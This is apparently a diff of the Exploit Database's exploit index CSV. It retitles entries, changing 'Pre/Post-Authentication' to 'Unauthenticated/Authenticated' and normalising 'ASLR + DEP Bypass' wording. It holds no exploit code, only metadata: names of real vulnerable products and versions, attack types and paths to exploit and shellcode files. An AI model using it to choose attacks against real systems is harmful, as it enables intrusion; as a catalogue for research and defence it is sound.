 16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
 16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",php,webapps,0
-16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Post-Authentication) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
+16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0
@@ -14087,7 +14086,7 @@ id,file,description,date,author,platform,type,port
 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0
 16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0
 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,"AtT4CKxT3rR0r1ST ",php,webapps,0
-16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Pre-Authentication Local File Inclusion",2011-03-05,TecR0c,php,webapps,0
+16280,platforms/php/webapps/16280.py,"Vtiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0
 16281,platforms/php/webapps/16281.txt,"BoutikOne - 'description.php' SQL Injection",2011-03-05,IRAQ_JAGUAR,php,webapps,0
 16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0
 16284,platforms/unix/dos/16284.rb,"Subversion - Date Svnserve",2010-08-07,Metasploit,unix,dos,0
@@ -14579,22 +14578,22 @@ id,file,description,date,author,platform,type,port 16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow",2010-05-09,Metasploit,windows,remote,8028 -16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.exe Pre-Authentication Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0 +16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0 16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U - Session Cookie Buffer Overflow",2010-03-10,Metasploit,windows,remote,0 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow",2010-02-15,Metasploit,windows,remote,0 16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow",2010-07-13,Metasploit,windows,remote,80 16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow",2010-12-15,Metasploit,windows,remote,18881 16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow",2010-05-09,Metasploit,windows,remote,8800 16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow",2010-11-11,Metasploit,cgi,remote,0 -16781,platforms/windows/remote/16781.rb,"MailEnable - Authorization Header Buffer Overflow",2010-07-07,Metasploit,windows,remote,0 +16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow",2010-07-07,Metasploit,windows,remote,0 16782,platforms/windows/remote/16782.rb,"Apache (Windows/x86) - (Windows/x86) Chunked 
Encoding",2010-07-07,Metasploit,windows,remote,0 16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit",2010-09-20,Metasploit,win_x86,remote,0 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration - Buffer Overflow",2010-11-24,Metasploit,windows,remote,80 16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows/x86) - URL Handling Buffer Overflow",2010-09-20,Metasploit,windows,remote,7144 16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,Metasploit,windows,remote,0 -16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execution",2010-11-24,Metasploit,cfm,webapps,0 -16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execution",2010-11-24,Metasploit,multiple,remote,8080 +16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload / Execution",2010-11-24,Metasploit,cfm,webapps,0 +16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution",2010-11-24,Metasploit,multiple,remote,8080 16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow",2010-05-09,Metasploit,windows,dos,8080 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow",2010-05-09,Metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager - OvWebHelp.exe CGI Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 
@@ -14705,10 +14704,10 @@ id,file,description,date,author,platform,type,port
 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0
 16901,platforms/php/webapps/16901.rb,"PAJAX - Remote Command Execution",2010-04-30,Metasploit,php,webapps,0
 16902,platforms/php/webapps/16902.rb,"CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0
-16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0
+16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution",2010-09-20,Metasploit,php,remote,0
 16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0
 16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0
-16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 - tinybrowser File Upload Code Execution",2010-06-15,Metasploit,php,webapps,0
+16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 tinybrowser - Arbitrary File Upload / Code Execution",2010-06-15,Metasploit,php,webapps,0
 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution",2010-07-01,Metasploit,hardware,webapps,0
 16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution",2010-07-14,Metasploit,cgi,webapps,0
 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution",2010-07-03,Metasploit,php,webapps,0
@@ -14761,7 +14760,7 @@ id,file,description,date,author,platform,type,port
 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows - Payload Execution",2011-03-08,Metasploit,windows,remote,0
 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0
 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos,0
-16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Pre-Authentication Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0
+16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0
 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0
 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - MultipleRemote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0
 16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 - Command Execution",2011-03-11,Metasploit,unix,remote,8812
@@ -14779,7 +14778,7 @@ id,file,description,date,author,platform,type,port
 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0
 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write",2011-03-14,Metasploit,windows,local,0
 16979,platforms/windows/dos/16979.html,"Opera 11.01 - NULL PTR Dereference",2011-03-15,echo,windows,dos,0
-16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Authentication Local File Inclusion (1)",2011-03-15,TecR0c,php,webapps,0
+16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Unauthenticated Local File Inclusion (1)",2011-03-15,TecR0c,php,webapps,0
 16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0
 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution",2011-03-15,Metasploit,windows,remote,0
 16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0
@@ -14880,7 +14879,7 @@ id,file,description,date,author,platform,type,port
 17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0
 17096,platforms/php/webapps/17096.html,"Allomani Super MultiMedia Library 2.5.0 - Cross-Site Request Forgery (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0
 17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - SQL Injection",2011-04-05,LiquidWorm,php,webapps,0
-17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Pre-Authentication kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0
+17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0
 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - Cross-Site Scripting",2011-04-01,"High-Tech Bridge SA",php,webapps,0
 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - Cross-Site Request Forgery",2011-04-01,"High-Tech Bridge SA",php,webapps,0
 17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 - news.php 'id' SQL Injection",2011-04-02,"Easy Laster",php,webapps,0
@@ -14952,13 +14951,13 @@ id,file,description,date,author,platform,type,port 17171,platforms/windows/local/17171.pl,"SimplyPlay 66 - '.pls' Buffer Overflow",2011-04-14,"C4SS!0 G0M3S",windows,local,0 17172,platforms/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0 17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script - Cross-Site Scripting",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0 -17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Post-Authentication Local File Inclusion / Edit",2011-04-15,bitform,multiple,webapps,0 +17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger 2.8.33 - Authenticated Local File Inclusion / Edit",2011-04-15,bitform,multiple,webapps,0 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 - SWF Memory Corruption",2011-04-16,Metasploit,windows,remote,0 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS - Arbitrary File Upload",2011-04-16,Alexander,asp,webapps,0 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (MS09-027) (Metasploit)",2011-04-16,"Andrew King",windows,local,0 17183,platforms/php/webapps/17183.txt,"osPHPSite - SQL Injection",2011-04-17,"vir0e5 ",php,webapps,0 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL - Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 -17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP + ASLR Bypass)",2011-04-19,Abysssec,windows,remote,0 +17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (ASLR + DEP Bypass)",2011-04-19,Abysssec,windows,remote,0 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1-1.4.4 - SEH Overflow",2011-04-18,sickness,windows,local,0 17186,platforms/windows/local/17186.rb,"Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow 
(1)",2011-04-19,Metasploit,windows,local,0 17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vulnerabilities",2011-04-22,NoNameMT,php,webapps,0 @@ -15087,7 +15086,7 @@ id,file,description,date,author,platform,type,port 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,Metasploit,windows,remote,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 -17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication Buffer Overflow",2011-06-01,b33f,windows,remote,0 +17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow",2011-06-01,b33f,windows,remote,0 17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow",2011-06-02,Metasploit,windows,remote,21 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 
@@ -15101,7 +15100,7 @@ id,file,description,date,author,platform,type,port
 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0
 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0
 17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
-17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Post-Authentication) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0
+17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Authenticated) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0
 17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
 17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0
 17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0
@@ -15144,7 +15143,7 @@ id,file,description,date,author,platform,type,port
 17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK - insecure method DownloadImageFileURL() Exploit (Metasploit)",2011-06-20,mr_me,windows,remote,0
 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution",2011-06-20,mr_me,windows,remote,0
 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 - On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,Metasploit,windows,remote,0
-17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Pre-Authentication Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0
+17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 - Unauthenticated Local File Inclusion (Metasploit) (2)",2011-06-20,TecR0c,php,webapps,0
 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox - 'nsTreeRange' Dangling Pointer (2)",2011-06-20,Abysssec,windows,remote,0
 17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service (PoC)",2011-06-20,BraniX,windows,dos,0
 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 - Arbitrary File Download",2011-06-21,ShellVision,hardware,remote,0
@@ -15423,7 +15422,7 @@ id,file,description,date,author,platform,type,port
 17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
 17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0
 17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection",2011-08-30,SubhashDasyam,php,webapps,0
-17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP + ASLR Bypass)",2011-08-30,sickness,windows,local,0
+17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (ASLR + DEP Bypass)",2011-08-30,sickness,windows,local,0
 17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin 2.0.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
 17756,platforms/php/webapps/17756.txt,"WordPress Plugin audio Gallery Playlist 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
 17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0
@@ -15465,7 +15464,7 @@ id,file,description,date,author,platform,type,port
 17798,platforms/php/webapps/17798.txt,"WordPress Community Events plugin 1.2.1 - SQL Injection",2011-09-08,"Miroslav Stampar",php,webapps,0
 17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - Cross-Site Request Forgery (add admin)",2011-09-08,"red virus",php,webapps,0
 17801,platforms/php/webapps/17801.rb,"WordPress 1 Flash Gallery 1.30 < 1.5.7a Plugin - Arbitrary File Upload (Metasploit)",2011-09-08,"Ben Schmidt",php,webapps,0
-17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0
+17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro - (SEH + ASLR + DEP Bypass) Exploit",2011-09-08,Rew,windows,local,0
 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0
 21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0
 17806,platforms/linux/dos/17806.txt,"FTP Client (Ubuntu 11.04) - Local Buffer Overflow Crash (PoC)",2011-09-08,localh0t,linux,dos,0
@@ -15479,7 +15478,7 @@ id,file,description,date,author,platform,type,port
 17815,platforms/windows/dos/17815.py,"MelOn Player 1.0.11.x - Denial of Service (PoC)",2011-09-09,modpr0be,windows,dos,0
 17816,platforms/php/webapps/17816.txt,"WordPress Tune Library plugin 2.17 - SQL Injection",2011-09-10,"Miroslav Stampar",php,webapps,0
 17817,platforms/windows/local/17817.php,"ScadaTEC ModbusTagServer & ScadaPhone - '.zip' Buffer Overflow",2011-09-12,mr_me,windows,local,0
-17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Post-Authentication Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0
+17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 - Authenticated Local File Inclusion",2011-09-12,brain[pillow],php,webapps,0
 17819,platforms/windows/remote/17819.py,"KnFTP Server - Buffer Overflow",2011-09-12,blake,windows,remote,0
 17820,platforms/windows/local/17820.c,"Aika 0.2 - colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0
 17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - '.pll' Buffer Overflow",2011-09-12,"Iván García Ferreira",windows,local,0
@@ -15585,7 +15584,7 @@ id,file,description,date,author,platform,type,port
 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0
 17938,platforms/php/webapps/17938.txt,"EFront 3.6.9 Community Edition - Multiple Vulnerabilities",2011-10-07,IHTeam,php,webapps,0
-17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal DEP + ASLR Bypass",2011-10-07,modpr0be,windows,local,0
+17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0
 17940,platforms/linux_mips/shellcode/17940.c,"Linux/MIPS - execve Shellcode (52 bytes)",2011-10-07,entropy,linux_mips,shellcode,0
 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution",2011-10-07,Metasploit,linux,webapps,0
 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0
@@ -15742,7 +15741,7 @@ id,file,description,date,author,platform,type,port
 18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0
 18116,platforms/multiple/dos/18116.html,"Firefox 8.0 - Null Pointer Dereference (PoC)",2011-11-14,0in,multiple,dos,0
 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-Based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0
-18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq File Upload",2011-11-15,PCA,php,webapps,0
+18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq Arbitrary File Upload",2011-11-15,PCA,php,webapps,0
 18121,platforms/php/webapps/18121.txt,"FreeWebShop 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0
 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN - SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0
 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,Metasploit,windows,remote,0
@@ -15754,7 +15753,7 @@ id,file,description,date,author,platform,type,port
 18129,platforms/php/webapps/18129.txt,"Blogs manager 1.101 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0
 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0
 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Exploit",2011-11-20,Metasploit,windows,remote,0
-18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR Bypass (Metasploit)",2011-11-21,hellok,win_x86,local,0
+18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows (ASLR + DEP Bypass) (Metasploit)",2011-11-21,hellok,win_x86,local,0
 18138,platforms/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0
 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - '.wav' Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0
@@ -15949,7 +15948,7 @@ id,file,description,date,author,platform,type,port
 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance - Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0
 18395,platforms/asp/webapps/18395.txt,"EasyPage - SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0
 18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0
-18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Pre-Authentication Command Execution",2012-01-20,Abysssec,windows,remote,0
+18397,platforms/windows/remote/18397.py,"Avaya WinPDM UniteHostRouter 3.8.2 - Remote Unauthenticated Command Execution",2012-01-20,Abysssec,windows,remote,0
 18401,platforms/windows/remote/18401.py,"Savant Web Server 3.1 - Buffer Overflow (Egghunter)",2012-01-21,red-dragon,windows,remote,0
 18402,platforms/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code Injection",2012-01-21,Or4nG.M4N,php,webapps,0
 18403,platforms/php/webapps/18403.txt,"Nova CMS - Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps,0
@@ -16064,8 +16063,8 @@ id,file,description,date,author,platform,type,port
 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow",2012-03-02,Metasploit,windows,local,0
 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0
 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0
-18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
-18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
+18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Authenticated SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0
+18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH 'Username' Buffer Overflow Unauthenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0
 18536,platforms/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - Cross-Site Request Forgery (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0
 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0
 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,Metasploit,windows,remote,0
@@ -16196,7 +16195,7 @@ id,file,description,date,author,platform,type,port
 18690,platforms/php/webapps/18690.txt,"BuddyPress plugin of WordPress - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0
 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0
 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - '.aiff' Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0
-18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR",2012-04-03,b33f,windows,local,0
+18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH + ASLR + DEP Bypass",2012-04-03,b33f,windows,local,0
 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - Cross-Site Request Forgery (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0
 18708,platforms/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",php,webapps,0
 18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,Metasploit,windows,remote,0
@@ -16210,7 +16209,7 @@ id,file,description,date,author,platform,type,port
 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - '.chm' / '.mobi' Memory Corruption",2012-04-23,shinnai,windows,dos,0
 18722,platforms/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",cgi,webapps,0
 18723,platforms/multiple/remote/18723.rb,"Snort 2 - DCE/RPC Preprocessor Buffer Overflow",2012-04-09,Metasploit,multiple,remote,0
-18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Post-Authentication OS Command Injection",2012-04-09,Metasploit,php,webapps,0
